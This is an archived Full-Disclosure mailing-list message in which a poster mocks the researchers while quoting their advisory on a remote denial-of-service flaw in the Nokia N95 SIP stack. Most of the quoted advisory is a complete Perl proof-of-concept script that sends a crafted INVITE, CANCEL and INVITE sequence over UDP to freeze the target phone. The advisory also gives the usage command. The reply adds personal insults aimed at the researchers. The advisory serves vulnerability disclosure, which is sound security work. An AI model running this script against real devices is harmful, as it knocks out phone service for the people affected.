[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <e9d9d4020712051121x17f0f81bk2745fb3c2e7b9d83@mail.gmail.com>
Date: Wed, 5 Dec 2007 13:21:06 -0600
From: reepex <reepex@...il.com>
To: "Radu State" <State@...ia.fr>, full-disclosure@...ts.grok.org.uk
Subject: Re: Nokia N95 cellphone remote DoS using the SIP
Stack
So almighty Phd what is your thesis exactly?
To me it seems to be 'how to run a fuzzer then write crappy perl scripts
to exploit DoS conditions'
does this properly summarize your phd credentials?
I guess you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'
I am sure you will serve the academic community great one day when teach
"hacking" classes revolving around the latest editions of hacking exposed
On Dec 5, 2007 11:05 AM, Radu State <State@...ia.fr> wrote:
> Nokia N95 cellphone remote DoS using the SIP Stack
>
>
>
> Severity:
>
> High – Denial of Service
>
>
>
> Hardware:
>
> Nokia N95
>
>
>
> Firmware:
>
> Tested version: Nokia RM-159 V 12.0.013
>
>
>
> Notification:
>
> Vulnerability found: 11 September 2007
>
> Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
> Security Support: 19 September 2007 / None reply
>
>
>
> Vulnerability Synopsis:
>
> If the device has the SIP Phone client activated, a sequence of SIP
> messages turn the device in an inconsistent state where the user is not able
> to operate it anymore until it reboots.
>
>
>
> The sequence of messages consists in 2 different SIP Dialogs where the
> first initiates an INVITE transaction but immediately closes it (in an
> anticipated manner). While, the second transaction initiates a normal INVITE
> transaction that trigger the vulnerability of the target.
>
>
>
> The sequence of messages is illustrated below.
>
>
>
> X ------------------------- INVITE -----------------------> Nokiav12
>
> X <---------------------- 100 Trying ---------------------- Nokiav12
>
> X ------------------------- CANCEL -----------------------> Nokiav12
>
> X <----------------- OK (to the Cancel) ------------------- Nokiav12
>
> X <---------------- 487 Request Terminated ---------------- Nokiav12
>
>
>
> --------New Dialog--------
>
>
>
> X ------------------------- INVITE -----------------------> Nokiav12
>
> X <---------------------- 100 Trying ---------------------- Nokiav12
>
> X <---------------------- 180 Trying ---------------------- Nokiav12
>
>
>
> ---- The device does not work properly anymore ----
>
>
>
> Impact:
>
> A remote entity can take down all the services of the cell phone
>
>
>
> Resolution:
>
> As we did not get any proper reply from Nokia about the subject, the best
> way will be to disable the SIP Client
>
>
>
> Credits:
>
> Humberto J. Abdelnur (Ph.D Student)
>
> Radu State (Ph.D)
>
> Olivier Festor (Ph.D)
>
>
>
> This vulnerability was identified by the Madynes research team at INRIA
> Lorraine, using KiF the Madynes VoIP fuzzer.
>
> http://madynes.loria.fr/
>
>
>
>
>
> Proof of Concept:
>
>
>
> A perl script (nokiav12.pl) is attached to this mail. Before launching
>
> it, the SIP phone has to be initialed in the target device
>
>
>
> Command:
>
> perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
>
>
>
> Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
>
>
>
>
>
> #!/usr/bin/perl
>
>
>
> ##################################################
>
> # Vulnerabily discovered using KiF ~ Kiph #
>
> # #
>
> # Authors: #
>
> # Humberto J. Abdelnur (Ph.D Student) #
>
> # Radu State (Ph.D) #
>
> # Olivier Festor (Ph.D) #
>
> # #
>
> # Madynes Team, LORIA - INRIA Lorraine #
>
> # http://madynes.loria.fr #
>
> ##################################################
>
>
>
> use IO::Socket::INET;
>
> use String::Random;
>
>
>
> die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
>
> unless ($ARGV[3]);
>
>
>
> $targetUser = $ARGV[1];
>
> $targetIP = $ARGV[0];
>
>
>
> $attackerUser = $ARGV[3];
>
> $attackerIP= $ARGV[2];
>
>
>
> $socket=new IO::Socket::INET->new(
>
> Proto=>'udp',
>
> PeerPort=>5060,
>
> PeerAddr=>$targetIP,
>
> LocalPort=>5060);
>
>
>
> $foo = new String::Random;
>
> $callid= $foo->randpattern("CCccnCn");
>
> $cseq = $foo->randregex('\d\d\d\d');
>
>
>
> $sdp = "v=0\r
>
> o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
>
> s=-\r
>
> c=IN IP4 $attackerIP\r
>
> t=0 0\r
>
> m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
>
> a=sendrecv\r
>
> a=ptime:20\r
>
> a=maxptime:200\r
>
> a=fmtp:96 mode-change-neighbor=1\r
>
> a=fmtp:18 annexb=no\r
>
> a=fmtp:98 0-15\r
>
> a=rtpmap:96 AMR/8000/1\r
>
> a=rtpmap:0 PCMU/8000/1\r
>
> a=rtpmap:8 PCMA/8000/1\r
>
> a=rtpmap:97 iLBC/8000/1\r
>
> a=rtpmap:18 G729/8000/1\r
>
> a=rtpmap:98 telephone-event/8000/1\r
>
> a=rtpmap:13 CN/8000/1\r
>
> ";
>
>
>
> $sdplen= length $sdp;
>
>
>
> $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=1\r
>
> To: <sip:$targetUser\@$targetIP>\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq INVITE\r
>
> Max-Forwards: 70\r
>
> Contact: <sip:$attackerUser\@$attackerIP>\r
>
> Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
>
> MESSAGE\r
>
> Content-Type: application/sdp\r
>
> Content-Length: $sdplen\r
>
> \r
>
> $sdp";
>
> $socket->send($msg);
>
> $text = '';
>
> while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
>
> $socket->recv($text,1024,0);
>
> }
>
>
>
> $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=1\r
>
> To: <sip:$targetUser\@$targetIP>;tag=1\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq CANCEL\r
>
> Max-Forwards: 70\r
>
> Content-Length: 0\r
>
> \r
>
> ";
>
> $socket->send($msg);
>
> time.sleep(1);
>
> $callid= $foo->randpattern("CCccnCn");
>
> $cseq = $foo->randregex('\d\d\d\d');
>
> $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=2\r
>
> To: <sip:$targetUser\@$targetIP>\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq INVITE\r
>
> Contact: <sip:$attackerUser\@$attackerIP>\r
>
> Max-Forwards: 70\r
>
> Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
>
> MESSAGE\r
>
> Content-Type: application/sdp\r
>
> Content-Length: $sdplen\r
>
> \r
>
> $sdp";
>
> $socket->send($msg);
>
>
>
>
>
>
>
> No virus found in this outgoing message.
> Checked by AVG Free Edition.
> Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
> 04/12/2007 19:31
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists